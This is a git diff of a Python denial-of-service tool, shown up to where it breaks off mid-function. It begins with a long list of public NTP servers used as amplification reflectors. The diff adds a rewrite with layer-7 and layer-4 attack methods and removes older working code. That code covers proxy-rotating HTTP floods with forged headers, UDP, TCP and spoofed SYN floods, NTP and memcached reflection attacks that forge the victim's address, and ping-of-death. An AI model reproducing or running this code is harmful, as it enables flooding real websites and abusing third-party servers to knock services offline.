-ntp.rsu.edu.ru -ntp.nict.jp -clock.nyc.he.net -clock.sjc.he.net -ntp.fiord.ru -gbg1.ntp.se -gbg2.ntp.se -mmo1.ntp.se -mmo2.ntp.se -sth1.ntp.se -sth2.ntp.se -svl1.ntp.se -svl2.ntp.se -ntp.se -ntp.yycix.ca -ntp.ix.ru -time-a.as43289.net -time-b.as43289.net -time-c.as43289.net -ntp.ripe.net -clock.isc.org (prev ntp.isc.org) -ntp.time.nl (ntp1.time.nl) -ntp0.as34288.net -ntp1.as34288.net -ntp1.jst.mfeed.ad.jp -ntp2.jst.mfeed.ad.jp -ntp3.jst.mfeed.ad.jp -pool.ntp.org -0.pool.ntp.org -1.pool.ntp.org -2.pool.ntp.org -3.pool.ntp.org -europe.pool.ntp.org -0.europe.pool.ntp.org -1.europe.pool.ntp.org -2.europe.pool.ntp.org -3.europe.pool.ntp.org -asia.pool.ntp.org -0.asia.pool.ntp.org -1.asia.pool.ntp.org -2.asia.pool.ntp.org -3.asia.pool.ntp.org -ru.pool.ntp.org -0.ru.pool.ntp.org -1.ru.pool.ntp.org -2.ru.pool.ntp.org -3.ru.pool.ntp.org -0.gentoo.pool.ntp.org -1.gentoo.pool.ntp.org -2.gentoo.pool.ntp.org -3.gentoo.pool.ntp.org -0.arch.pool.ntp.org -1.arch.pool.ntp.org -2.arch.pool.ntp.org -3.arch.pool.ntp.org -0.fedora.pool.ntp.org -1.fedora.pool.ntp.org -2.fedora.pool.ntp.org -3.fedora.pool.ntp.org -0.opensuse.pool.ntp.org -1.opensuse.pool.ntp.org -2.opensuse.pool.ntp.org -3.opensuse.pool.ntp.org -0.centos.pool.ntp.org -1.centos.pool.ntp.org -2.centos.pool.ntp.org -3.centos.pool.ntp.org -0.debian.pool.ntp.org -1.debian.pool.ntp.org -2.debian.pool.ntp.org -3.debian.pool.ntp.org -0.askozia.pool.ntp.org -1.askozia.pool.ntp.org -2.askozia.pool.ntp.org -3.askozia.pool.ntp.org -0.freebsd.pool.ntp.org -1.freebsd.pool.ntp.org -2.freebsd.pool.ntp.org -3.freebsd.pool.ntp.org -0.netbsd.pool.ntp.org -1.netbsd.pool.ntp.org -2.netbsd.pool.ntp.org -3.netbsd.pool.ntp.org -0.openbsd.pool.ntp.org -1.openbsd.pool.ntp.org -2.openbsd.pool.ntp.org -3.openbsd.pool.ntp.org -0.dragonfly.pool.ntp.org -1.dragonfly.pool.ntp.org -2.dragonfly.pool.ntp.org -3.dragonfly.pool.ntp.org -0.pfsense.pool.ntp.org -1.pfsense.pool.ntp.org -2.pfsense.pool.ntp.org -3.pfsense.pool.ntp.org -0.opnsense.pool.ntp.org -1.opnsense.pool.ntp.org -2.opnsense.pool.ntp.org -3.opnsense.pool.ntp.org -0.amazon.pool.ntp.org -1.amazon.pool.ntp.org -2.amazon.pool.ntp.org -3.amazon.pool.ntp.org -tick.usno.navy.mil -tock.usno.navy.mil -ntp2.usno.navy.mil -utcnist2.colorado.edu -timekeeper.isi.edu -rackety.udel.edu -mizbeaver.udel.edu -otc1.psu.edu -gnomon.cc.columbia.edu -navobs1.gatech.edu -navobs1.wustl.edu -now.okstate.edu -ntp.colby.edu -ntp-s1.cise.ufl.edu -ntpstm.netbone-digital.com -nist1.symmetricom.com -t2.timegps.net -gps.layer42.net -ntp-ca.stygium.net -sesku.planeacion.net -ntp0.nl.uu.net -ntp1.nl.uu.net -navobs1.oar.net -ntp-galway.hea.net -ntp1.ona.org -time.fu-berlin.de -atom.uhr.de -ntps1-0.cs.tu-berlin.de -ntps1-1.cs.tu-berlin.de -ntps1-0.uni-erlangen.de -ntps1-1.uni-erlangen.de -ntp1.fau.de -ntp2.fau.de -ntp.dianacht.de -zeit.fu-berlin.de -ptbtime1.ptb.de -ptbtime2.ptb.de -rustime01.rus.uni-stuttgart.de -rustime02.rus.uni-stuttgart.de -chime1.surfnet.nl -ntp.vsl.nl -asynchronos.iiss.at -ntp.nic.cz -time.ufe.cz -ntp.fizyka.umk.pl -ntp1.usv.ro -ntp3.usv.ro -timehost.lysator.liu.se -time1.stupi.se -time.nrc.ca -clock.uregina.ca -cronos.cenam.mx -ntp.lcf.mx -hora.roa.es -minuto.roa.es -ntp1.inrim.it -ntp2.inrim.it -ntp1.oma.be -ntp2.oma.be -ntp.atomki.mta.hu -ntp.i2t.ehu.eus -ntp.neel.ch -ntp.neu.edu.cn -ntp.nict.jp -ntps1.pads.ufrj.br -ntp.shoa.cl -time.esa.int -time1.esa.int -http://support.ntp.org/bin/view/Servers/StratumOneTimeServers -http://support.ntp.org/bin/view/Servers/StratumTwoTimeServers -http://support.ntp.org/bin/view/Servers/NTPPoolServers -http://www.pool.ntp.org/zone/@ -http://www.pool.ntp.org/zone/asia -http://www.pool.ntp.org/zone/europe -http://www.pool.ntp.org/zone/north-america -http://www.pool.ntp.org/zone/oceania -http://www.pool.ntp.org/zone/south-america -https://time.nl/ -https://time.nl/index_en.html diff --git a/files/proxys/proxy.txt b/files/proxys/proxy.txt new file mode 100644 index 0000000..e69de29 diff --git a/requirements.txt b/requirements.txt index de7dcdb..3ac7f40 100644 --- a/requirements.txt +++ b/requirements.txt @@ -1,6 +1,8 @@ -requests -pysocks -socks -cfscrape -icmplib -scapy +cloudscraper<=1.2.58 +certifi<=2021.10.8 +yarl<=1.7.2 +requests<=2.27.1 +pysocks<=1.7.1 +git+https://github.com/SecureAuthCorp/impacket.git +psutil>=5.9.0 +icmplib>=3.0.2 diff --git a/start.py b/start.py index 2480b78..09a3580 100644 --- a/start.py +++ b/start.py @@ -1,1748 +1,870 @@ #!/usr/bin/env python3 # -*- coding: utf-8 -*- +import json +import os.path +import re +import string +from _socket import gethostname +from contextlib import suppress +from itertools import cycle +from math import trunc, log2 +from multiprocessing import Pool, cpu_count +from random import randint, choice as randchoice, sample, randbytes +from socket import (IP_HDRINCL, IPPROTO_IP, inet_ntoa, IPPROTO_TCP, TCP_NODELAY, SOCK_STREAM, AF_INET, SOL_TCP, socket, + SOCK_DGRAM, SOCK_RAW) +from ssl import SSLContext, create_default_context, CERT_NONE +from struct import pack as data_pack +from sys import argv, exit +from threading import Thread, Event +from time import sleep +from typing import Set, List, Any, Tuple -l7 = [ - "CFB", "BYPASS", "GET", "POST", "OVH", "STRESS", "OSTRESS", "DYN", "SLOW", - "HEAD", "HIT", "NULL", "COOKIE", "BRUST", "PPS", "EVEN", "GSB", "DGB", - "AVB" -] -l4 = ["TCP", "UDP", "SYN", "VSE", "MEM", "NTP"] -l3 = ["POD", "ICMP"] -to = ["CFIP", "DNS", "PING", "CHECK", "DSTAT", "INFO"] -ot = ["STOP", "TOOLS", "HELP"] -methods = l7 + l4 + l3 -methodsl = l7 + l4 + l3 + to + ot +from certifi import where +from cloudscraper import create_scraper +from icmplib import ping +from impacket.ImpactPacket import IP, TCP, UDP, Data +from psutil import process_iter, net_io_counters, virtual_memory, cpu_percent +from requests import get, Session +from socks import socksocket, HTTP, SOCKS5, SOCKS4 +from yarl import URL + +localIP = get('http://ip.42.pl/raw').text + +ctx: SSLContext = create_default_context(cafile=where()) +ctx.check_hostname = False +ctx.verify_mode = CERT_NONE + +__version__ = "2.0 SNAPSHOT" -def spoofer(): - addr = [192, 168, 0, 1] - d = '.' - addr[0] = str(random.randrange(11, 197)) - addr[1] = str(random.randrange(0, 255)) - addr[2] = str(random.randrange(0, 255)) - addr[3] = str(random.randrange(2, 254)) - assemebled = addr[0] + d + addr[1] + d + addr[2] + d + addr[3] - return assemebled +class Methods: + LAYER7_METHODS: Set[str] = {"CFB", "BYPASS", "GET", "POST", "OVH", "STRESS", + "DYN", "SLOW", "HEAD", "NULL", "COOKIE", "PPS", + "EVEN", "GSB", "DGB", "AVB", "MINECRAFT"} + + LAYER4_METHODS: Set[str] = {"TCP", "UDP", "SYN", "VSE", "MEM", "NTP", "DNS", "ARD", "CHAR", "RDP"} + ALL_METHODS: Set[str] = {*LAYER4_METHODS, *LAYER7_METHODS} -def start_attack(method, threads, event, socks_type): - global out_file - # layer7 - cmethod = str(method.upper()) - if (cmethod != "HIT") and (cmethod not in l4) and (cmethod not in l3) and ( - cmethod != "OSTRESS"): - out_file = str("files/proxys/" + sys.argv[5]) - proxydl(out_file, socks_type) - print("{} Attack Started To {}:{} For {} Seconds With {}/{} Proxy ". - format(method, target, port, sys.argv[7], len(proxies), - str(nums))) - else: - print("{} Attack Started To {}:{} For {} Seconds".format( - method, target, port, sys.argv[7])) - try: - if method == "post": - for _ in range(threads): - threading.Thread(target=post, - args=(event, socks_type), - daemon=True).start() - elif method == "brust": - for _ in range(threads): - threading.Thread(target=brust, - args=(event, socks_type), - daemon=True).start() - elif method == "get": - for _ in range(threads): - threading.Thread(target=http, - args=(event, socks_type), - daemon=True).start() - elif method == "pps": - for _ in range(threads): - threading.Thread(target=pps, - args=(event, socks_type), - daemon=True).start() - elif method == "even": - for _ in range(threads): - threading.Thread(target=even, - args=(event, socks_type), - daemon=True).start() - elif method == "ovh": - for _ in range(threads): - threading.Thread(target=ovh, - args=(event, socks_type), - daemon=True).start() - elif method == "capb": - for _ in range(threads): - threading.Thread(target=capb, - args=(event, socks_type), - daemon=True).start() - elif method == "cookie": - for _ in range(threads): - threading.Thread(target=cookie, - args=(event, socks_type), - daemon=True).start() - elif method == "tor": - for _ in range(threads): - threading.Thread(target=tor, - args=(event, socks_type), - daemon=True).start() - elif method == "bypass": - for _ in range(threads): - threading.Thread(target=bypass, - args=(event, socks_type), - daemon=True).start() - elif method == "head": - for _ in range(threads): - threading.Thread(target=head, - args=(event, socks_type), - daemon=True).start() - elif method == "stress": - for _ in range(threads): - threading.Thread(target=stress, - args=(event, socks_type), - daemon=True).start() - elif method == "ostress": - for _ in range(threads): - threading.Thread(target=ostress, - args=(event, socks_type), - daemon=True).start() - elif method == "null": - for _ in range(threads): - threading.Thread(target=null, - args=(event, socks_type), - daemon=True).start() - elif method == "cfb": - for _ in range(threads): - threading.Thread(target=cfb, - args=(event, socks_type), - daemon=True).start() - elif method == "avb": - for _ in range(threads): - threading.Thread(target=AVB, - args=(event, socks_type), - daemon=True).start() - elif method == "gsb": - for _ in range(threads): - threading.Thread(target=gsb, - args=(event, socks_type), - daemon=True).start() - elif method == "dgb": - for _ in range(threads): - threading.Thread(target=dgb, - args=(event, socks_type), - daemon=True).start() - elif method == "dyn": - for _ in range(threads): - threading.Thread(target=dyn, - args=(event, socks_type), - daemon=True).start() - elif method == "hit": - for _ in range(threads): - threading.Thread(target=hit, args=(event, timer), - daemon=True).start() +class Tools: + randString = lambda length: ''.join(sample(string.ascii_letters, length)) + randIPv4 = lambda: inet_ntoa(data_pack('>I', randint(1, 0xffffffff))) - # layer4 - - elif method == "vse": - for _ in range(threads): - threading.Thread(target=vse, args=(event, timer), - daemon=True).start() - elif method == "udp": - for _ in range(threads): - threading.Thread(target=udp, args=(event, timer), - daemon=True).start() - elif method == "tcp": - for _ in range(threads): - threading.Thread(target=tcp, args=(event, timer), - daemon=True).start() - elif method == "syn": - for _ in range(threads): - threading.Thread(target=syn, args=(event, timer), - daemon=True).start() - elif method == "mem": - for _ in range(threads): - threading.Thread(target=mem, args=(event, timer), - daemon=True).start() - elif method == "ntp": - for _ in range(threads): - threading.Thread(target=ntp, args=(event, timer), - daemon=True).start() - - # layer3 - elif method == "icmp": - for _ in range(threads): - threading.Thread(target=icmp, args=(event, timer), - daemon=True).start() - elif method == "pod": - for _ in range(threads): - threading.Thread(target=pod, args=(event, timer), - daemon=True).start() - except: - pass - - -def random_data(): - return str( - Choice(strings) + str(Intn(0, 271400281257)) + Choice(strings) + - str(Intn(0, 271004281257)) + Choice(strings) + Choice(strings) + - str(Intn(0, 271400281257)) + Choice(strings) + - str(Intn(0, 271004281257)) + Choice(strings)) - - -def Headers(method): - header = "" - if method == "get" or method == "head": - connection = "Connection: Keep-Alive\r\n" - accept = Choice(acceptall) + "\r\n" - referer = "Referer: " + referers + target + path + "\r\n" - connection += "Cache-Control: max-age=0\r\n" - connection += "pragma: no-cache\r\n" - connection += "X-Forwarded-For: " + spoofer() + "\r\n" - useragent = "User-Agent: " + UserAgent + "\r\n" - header = referer + useragent + accept + connection + "\r\n\r\n" - elif method == "cookie": - connection = "Connection: Keep-Alive\r\n" - more = "cache-control: no-cache\r\n" - parm = "pragma: no-cache\r\n" - up = "upgrade-insecure-requests: 1" - connection += "Cookies: " + str(secrets.token_urlsafe(16)) + "\r\n" - accept = Choice(acceptall) + "\r\n" - referer = "Referer: " + referers + target + path + "\r\n" - useragent = "User-Agent: " + UserAgent + "\r\n" - header = referer + useragent + accept + connection + more + up + parm + "\r\n\r\n" - elif method == "brust": - connection = "Connection: Keep-Alive\r\n" - more = "Cache-Control: max-age=0\r\n" - more2 = "Via: 1.0 PROXY\r\n" - proxyd = str(proxy) - xfor = "X-Forwarded-For: " + proxyd + "\r\n" - accept = "Accept: */*\r\n" - referer = "Referer: " + referers + target + path + "\r\n" - useragent = "User-Agent: " + UserAgent + "\r\n" - header = referer + useragent + accept + connection + more + xfor + more2 + "\r\n\r\n" - elif method == "even": - up = "Upgrade-Insecure-Requests: 1\r\n" - referer = "Referer: " + referers + target + path + "\r\n" - useragent = "User-Agent: " + UserAgent + "\r\n" - proxyd = str(proxy) - xfor = "X-Forwarded-For: " + proxyd + "\r\n" - header = referer + useragent + up + xfor + "\r\n\r\n" - elif method == "ovh": - accept = Choice(acceptall) + "\r\n" - more = "Connection: keep-alive\r\n" - connection = "Cache-Control: max-age=0\r\n" - connection += "pragma: no-cache\r\n" - connection += "X-Forwarded-For: " + spoofer() + "\r\n" - up = "Upgrade-Insecure-Requests: 1\r\n" - useragent = "User-Agent: " + UserAgent + "\r\n" - header = useragent + more + accept + up + "\r\n\r\n" - elif method == "pps": - header = "GET / HTTP/1.1\r\n\r\n" - elif method == "dyn": - connection = "Connection: Keep-Alive\r\n" - accept = Choice(acceptall) + "\r\n" - connection += "Cache-Control: max-age=0\r\n" - connection += "pragma: no-cache\r\n" - connection += "X-Forwarded-For: " + spoofer() + "\r\n" - referer = "Referer: " + referers + target + path + "\r\n" - useragent = "User-Agent: " + UserAgent + "\r\n" - header = referer + useragent + accept + connection + "\r\n\r\n" - elif method == "socket": - header = "" - elif method == "null": - connection = "Connection: null\r\n" - accept = Choice(acceptall) + "\r\n" - connection += "Cache-Control: max-age=0\r\n" - connection += "pragma: no-cache\r\n" - connection += "X-Forwarded-For: " + spoofer() + "\r\n" - referer = "Referer: null\r\n" - useragent = "User-Agent: null\r\n" - header = referer + useragent + accept + connection + "\r\n\r\n" - elif method == "post": - post_host = "POST " + path + " HTTP/1.1\r\nHost: " + target + "\r\n" - content = "Content-Type: application/x-www-form-urlencoded\r\nX-Requested-With: XMLHttpRequest\r\n charset=utf-8\r\n" - refer = "Referer: http://" + target + path + "\r\n" - user_agent = "User-Agent: " + UserAgent + "\r\n" - accept = Choice(acceptall) + "\r\n" - connection = "Cache-Control: max-age=0\r\n" - connection += "pragma: no-cache\r\n" - connection += "X-Forwarded-For: " + spoofer() + "\r\n" - data = str(random._urandom(8)) - length = "Content-Length: " + str( - len(data)) + " \r\nConnection: Keep-Alive\r\n" - header = post_host + accept + connection + refer + content + user_agent + length + "\n" + data + "\r\n\r\n" - elif method == "hit": - post_host = "POST " + path + " HTTP/1.1\r\nHost: " + target + "\r\n" - content = "Content-Type: application/x-www-form-urlencoded\r\nX-Requested-With: XMLHttpRequest\r\n charset=utf-8\r\n" - refer = "Referer: http://" + target + path + "\r\n" - user_agent = "User-Agent: " + UserAgent + "\r\n" - connection = "Cache-Control: max-age=0\r\n" - connection += "pragma: no-cache\r\n" - connection += "X-Forwarded-For: " + spoofer() + "\r\n" - accept = Choice(acceptall) + "\r\n" - data = str(random._urandom(8)) - length = "Content-Length: " + str( - len(data)) + " \r\nConnection: Keep-Alive\r\n" - header = post_host + accept + connection + refer + content + user_agent + length + "\n" + data + "\r\n\r\n" - return header - - -def UrlFixer(original_url): - global target, path, port, protocol - original_url = original_url.strip() - url = "" - path = "/" - port = 80 - protocol = "http" - if original_url[:7] == "http://": - url = original_url[7:] - elif original_url[:8] == "https://": - url = original_url[8:] - protocol = "https" - tmp = url.split("/") - website = tmp[0] - check = website.split(":") - if len(check) != 1: - port = int(check[1]) - else: - if protocol == "https": - port = 443 - target = check[0] - if len(tmp) > 1: - path = url.replace(website, "", 1) - - -def udp(event, timer): - event.wait() - s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) - while time.time() < timer: - try: - try: - data = random._urandom(int(Intn(1024, 60000))) - for _ in range(multiple): - s.sendto(data, (str(target), int(port))) - except: - s.close() - except: - s.close() - - -def icmp(event, timer): - event.wait() - while time.time() < timer: - try: - for _ in range(multiple): - packet = random._urandom(int(Intn(1024, 60000))) - pig(target, - count=10, - interval=0.2, - payload_size=len(packet), - payload=packet) - except: - pass - - -ntp_payload = "\x17\x00\x03\x2a" + "\x00" * 4 - - -def ntp(event, timer): - packets = Intn(10, 150) - server = Choice(ntpsv) - event.wait() - while time.time() < timer: - try: - packet = (IP(dst=server, src=target) / - UDP(sport=Intn(1, 65535), dport=int(port)) / - Raw(load=ntp_payload)) - try: - for _ in range(multiple): - send(packet, count=packets, verbose=False) - except: - pass - except: - pass - - -mem_payload = "\x00\x00\x00\x00\x00\x01\x00\x00stats\r\n" - - -def mem(event, timer): - event.wait() - packets = Intn(1024, 60000) - server = Choice(memsv) - while time.time() < timer: - try: - try: - packet = (IP(dst=server, src=target) / - UDP(sport=port, dport=11211) / Raw(load=mem_payload)) - for _ in range(multiple): - send(packet, count=packets, verbose=False) - except: - pass - except: - pass - - -def tcp(event, timer): - event.wait() - s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) - - while time.time() < timer: - try: - data = random._urandom(int(Intn(1024, 60000))) - address = (str(target), int(port)) - try: - s.connect(address) - for _ in range(multiple): - s.send(data) - except: - s.close() - except: - s.close() - - -def vse(event, timer): - event.wait() - s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) - while time.time() < timer: - try: - address = (str(target), int(port)) - try: - s.connect(address) - for _ in range(multiple): - s.send(data) - except: - s.close() - except: - s.close() - - -class DNSQuery: - - def __init__(self, data): - self.data = data - self.dominio = '' - self.DnsType = '' - - HDNS = data[-4:-2].encode("hex") - if HDNS == "0001": - self.DnsType = 'A' - elif HDNS == "000f": - self.DnsType = 'MX' - elif HDNS == "0002": - self.DnsType = 'NS' - elif HDNS == "0010": - self.DnsType = "TXT" + @staticmethod + def humanbytes(i: int, binary: bool = False, precision: int = 2): + MULTIPLES = ["B", "k{}B", "M{}B", "G{}B", "T{}B", "P{}B", "E{}B", "Z{}B", "Y{}B"] + if i > 0: + base = 1024 if binary else 1000 + multiple = trunc(log2(i) / log2(base)) + value = i / pow(base, multiple) + suffix = MULTIPLES[multiple].format("i" if binary else "") + return f"{value:.{precision}f} {suffix}" else: - self.DnsType = "Unknown" - - tipo = (ord(data[2]) >> 3) & 15 # Opcode bits - if tipo == 0: # Standard query - ini = 12 - lon = ord(data[ini]) - while lon != 0: - self.dominio += data[ini + 1:ini + lon + 1] + '.' - ini += lon + 1 - lon = ord(data[ini]) - - def respuesta(self, ip): - packet = '' - if self.dominio: - packet += self.data[:2] + "\x81\x80" - packet += self.data[4:6] + self.data[ - 4:6] + '\x00\x00\x00\x00' # Questions and Answers Counts - packet += self.data[12:] # Original Domain Name Question - packet += '\xc0\x0c' # Pointer to domain name - packet += '\x00\x01\x00\x01\x00\x00\x00\x3c\x00\x04' # Response type, ttl and resource data length -> 4 bytes - packet += str.join('', map(lambda x: chr(int(x)), - ip.split('.'))) # 4bytes of IP - return packet - - -def dns(event, timer): - event.wait() - while time.time() < timer: - try: - s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) - s.bind(('', 53)) - data, addr = s.recvfrom(1024) - p = DNSQuery(data) - for _ in range(multiple): - s.sendto(p.respuesta(target), addr) - except: - s.close() - - -def syn(event, timer): - event.wait() - while time.time() < timer: - try: - IP_Packet = IP() - IP_Packet.src = randomIP() - IP_Packet.dst = target - - TCP_Packet = TCP() - TCP_Packet.sport = randint(1, 65535) - TCP_Packet.dport = int(port) - TCP_Packet.flags = "S" - TCP_Packet.seq = randint(1000, 9000) - TCP_Packet.window = randint(1000, 9000) - for _ in range(multiple): - send(IP_Packet / TCP_Packet, verbose=0) - except: - pass - - -def pod(event, timer): - event.wait() - while time.time() < timer: - try: - rand_addr = spoofer() - ip_hdr = IP(src=rand_addr, dst=target) - packet = ip_hdr / ICMP() / ("m" * 60000) - send(packet) - except: - pass - - -def stop(): - print('All Attacks Stopped !') - os.system('pkill python*') - exit() - - -def dyn(event, socks_type): - header = Headers("dyn") - proxy = Choice(proxies).strip().split(":") - get_host = "GET " + path + "?" + random_data( - ) + " HTTP/1.1\r\nHost: " + random_data() + "." + target + "\r\n" - s = socks.socksocket() - request = get_host + header - event.wait() - while time.time() < timer: - try: - s = socks.socksocket() - if socks_type == 4: - s.set_proxy(socks.SOCKS4, str(proxy[0]), int(proxy[1])) - if socks_type == 5: - s.set_proxy(socks.SOCKS5, str(proxy[0]), int(proxy[1])) - if socks_type == 1: - s.set_proxy(socks.HTTP, str(proxy[0]), int(proxy[1])) - s.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1) - s.connect((str(target), int(port))) - if protocol == "https": - ctx = ssl.SSLContext() - s = ctx.wrap_socket(s, server_hostname=target) - try: - for _ in range(multiple): - s.send(str.encode(request)) - except: - s.close() - except: - s.close() - - -def http(event, socks_type): - header = Headers("get") - proxy = Choice(proxies).strip().split(":") - get_host = "GET " + path + " HTTP/1.1\r\nHost: " + target + "\r\n" - request = get_host + header - event.wait() - s = socks.socksocket() - while time.time() < timer: - try: - s = socks.socksocket() - if socks_type == 4: - s.set_proxy(socks.SOCKS4, str(proxy[0]), int(proxy[1])) - if socks_type == 5: - s.set_proxy(socks.SOCKS5, str(proxy[0]), int(proxy[1])) - if socks_type == 1: - s.set_proxy(socks.HTTP, str(proxy[0]), int(proxy[1])) - s.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1) - s.connect((str(target), int(port))) - if protocol == "https": - ctx = ssl.SSLContext() - s = ctx.wrap_socket(s, server_hostname=target) - try: - for _ in range(multiple): - s.send(str.encode(request)) - except: - s.close() - except: - s.close() - - -def capb(event, socks_type): - header = Headers("get") - proxy = Choice(proxies).strip().split(":") - get_host = "GET " + path + " HTTP/1.1\r\nHost: " + target + "\r\n" - request = get_host + header - event.wait() - s = socks.socksocket() - while time.time() < timer: - try: - s = socks.socksocket() - if socks_type == 4: - s.set_proxy(socks.SOCKS4, str(proxy[0]), int(proxy[1])) - if socks_type == 5: - s.set_proxy(socks.SOCKS5, str(proxy[0]), int(proxy[1])) - if socks_type == 1: - s.set_proxy(socks.HTTP, str(proxy[0]), int(proxy[1])) - s.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1) - s.connect((str(target), int(port))) - if protocol == "https": - ctx = ssl.SSLContext() - s = ctx.wrap_socket(s, server_hostname=target) - try: - for _ in range(multiple): - s.send(str.encode(request)) - except: - s.close() - except: - s.close() - - -def ovh(event, socks_type): - header = Headers("ovh") - proxy = Choice(proxies).strip().split(":") - get_host = "HEAD " + path + "/" + str(Intn( - 1111111111, 9999999999)) + " HTTP/1.1\r\nHost: " + target + "\r\n" - request = get_host + header - event.wait() - s = socks.socksocket() - while time.time() < timer: - try: - s = socks.socksocket() - if socks_type == 4: - s.set_proxy(socks.SOCKS4, str(proxy[0]), int(proxy[1])) - if socks_type == 5: - s.set_proxy(socks.SOCKS5, str(proxy[0]), int(proxy[1])) - if socks_type == 1: - s.set_proxy(socks.HTTP, str(proxy[0]), int(proxy[1])) - s.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1) - s.connect((str(target), int(port))) - if protocol == "https": - ctx = ssl.SSLContext() - s = ctx.wrap_socket(s, server_hostname=target) - try: - for _ in range(multiple): - s.send(str.encode(request)) - except: - s.close() - except: - s.close() - - -def pps(event, socks_type): - proxy = Choice(proxies).strip().split(":") - request = Headers("pps") - event.wait() - s = socks.socksocket() - while time.time() < timer: - try: - s = socks.socksocket() - if socks_type == 4: - s.set_proxy(socks.SOCKS4, str(proxy[0]), int(proxy[1])) - if socks_type == 5: - s.set_proxy(socks.SOCKS5, str(proxy[0]), int(proxy[1])) - if socks_type == 1: - s.set_proxy(socks.HTTP, str(proxy[0]), int(proxy[1])) - s.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1) - s.connect((str(target), int(port))) - if protocol == "https": - ctx = ssl.SSLContext() - s = ctx.wrap_socket(s, server_hostname=target) - try: - for _ in range(multiple): - s.send(str.encode(request)) - except: - s.close() - except: - s.close() - - -def even(event, socks_type): - global proxy - proxy = Choice(proxies).strip().split(":") - header = Headers("even") - get_host = "GET " + path + " HTTP/1.1\r\nHost: " + target + "\r\n" - request = get_host + header - event.wait() - s = socks.socksocket() - while time.time() < timer: - try: - s = socks.socksocket() - if socks_type == 4: - s.set_proxy(socks.SOCKS4, str(proxy[0]), int(proxy[1])) - if socks_type == 5: - s.set_proxy(socks.SOCKS5, str(proxy[0]), int(proxy[1])) - if socks_type == 1: - s.set_proxy(socks.HTTP, str(proxy[0]), int(proxy[1])) - s.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1) - s.connect((str(target), int(port))) - if protocol == "https": - ctx = ssl.SSLContext() - s = ctx.wrap_socket(s, server_hostname=target) - try: - for _ in range(multiple): - s.send(str.encode(request)) - except: - s.close() - except: - s.close() - - -def brust(event, socks_type): - global proxy - proxy = Choice(proxies).strip().split(":") - header = Headers("brust") - get_host = "GET " + path + " HTTP/1.1\r\nHost: " + target + "\r\n" - request = get_host + header - event.wait() - s = socks.socksocket() - while time.time() < timer: - try: - s = socks.socksocket() - if socks_type == 4: - s.set_proxy(socks.SOCKS4, str(proxy[0]), int(proxy[1])) - if socks_type == 5: - s.set_proxy(socks.SOCKS5, str(proxy[0]), int(proxy[1])) - if socks_type == 1: - s.set_proxy(socks.HTTP, str(proxy[0]), int(proxy[1])) - s.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1) - s.connect((str(target), int(port))) - if protocol == "https": - ctx = ssl.SSLContext() - s = ctx.wrap_socket(s, server_hostname=target) - try: - for _ in range(multiple): - s.send(str.encode(request)) - except: - s.close() - except: - s.close() - - -def cookie(event, socks_type): - proxy = Choice(proxies).strip().split(":") - header = Headers("cookie") - get_host = "GET " + path + " HTTP/1.1\r\nHost: " + target + "\r\n" - request = get_host + header - event.wait() - s = socks.socksocket() - while time.time() < timer: - try: - s = socks.socksocket() - if socks_type == 4: - s.set_proxy(socks.SOCKS4, str(proxy[0]), int(proxy[1])) - if socks_type == 5: - s.set_proxy(socks.SOCKS5, str(proxy[0]), int(proxy[1])) - if socks_type == 1: - s.set_proxy(socks.HTTP, str(proxy[0]), int(proxy[1])) - s.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1) - s.connect((str(target), int(port))) - if protocol == "https": - ctx = ssl.SSLContext() - s = ctx.wrap_socket(s, server_hostname=target) - try: - for _ in range(multiple): - s.send(str.encode(request)) - except: - s.close() - except: - s.close() - - -def cfb(event, socks_type): - header = Headers("get") - proxy = Choice(proxies).strip().split(":") - get_host = "GET " + path + "?" + random_data( - ) + " HTTP/1.1\r\nHost: " + target + "\r\n" - request = get_host + header - event.wait() - s = socks.socksocket() - while time.time() < timer: - try: - s = socks.socksocket() - if socks_type == 4: - s.set_proxy(socks.SOCKS4, str(proxy[0]), int(proxy[1])) - if socks_type == 5: - s.set_proxy(socks.SOCKS5, str(proxy[0]), int(proxy[1])) - if socks_type == 1: - s.set_proxy(socks.HTTP, str(proxy[0]), int(proxy[1])) - s.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1) - s.connect((str(target), int(port))) - if protocol == "https": - ctx = ssl.SSLContext() - s = ctx.wrap_socket(s, server_hostname=target) - cfscrape.create_scraper(sess=s) - try: - for _ in range(multiple): - s.sendall(str.encode(request)) - except: - s.close() - except: - s.close() - - -# def tor(event, socks_type): -# event.wait() -# while time.time() < timer: -# with tor_requests_session() as s: -# s.get(sys.argv[2]) - - -def AVB(event, socks_type): - proxy = Choice(proxies).strip().split(":") - event.wait() - payload = str(random._urandom(64)) - while time.time() < timer: - try: - s = cfscrape.create_scraper() - if socks_type == 5 or socks_type == 4: - s.proxies['http'] = 'socks{}://'.format(socks_type) + str( - proxy[0]) + ":" + str(proxy[1]) - s.proxies['https'] = 'socks{}://'.format(socks_type) + str( - proxy[0]) + ":" + str(proxy[1]) - if socks_type == 1: - s.proxies['http'] = 'http://' + str(proxy[0]) + ":" + str( - proxy[1]) - s.proxies['https'] = 'https://' + str(proxy[0]) + ":" + str( - proxy[1]) - if protocol == "https": - s.DEFAULT_CIPHERS = "TLS_AES_256_GCM_SHA384:ECDHE-ECDSA-AES256-SHA384" - try: - for _ in range(multiple): - s.post(sys.argv[2], timeout=1, data=payload) - except: - s.close() - except: - s.close() - - -def bypass(event, socks_type): - proxy = Choice(proxies).strip().split(":") - event.wait() - payload = str(random._urandom(64)) - while time.time() < timer: - try: - s = requests.Session() - if socks_type == 5 or socks_type == 4: - s.proxies['http'] = 'socks{}://'.format(socks_type) + str( - proxy[0]) + ":" + str(proxy[1]) - s.proxies['https'] = 'socks{}://'.format(socks_type) + str( - proxy[0]) + ":" + str(proxy[1]) - if socks_type == 1: - s.proxies['http'] = 'http://' + str(proxy[0]) + ":" + str( - proxy[1]) - s.proxies['https'] = 'https://' + str(proxy[0]) + ":" + str( - proxy[1]) - if protocol == "https": - s.DEFAULT_CIPHERS = 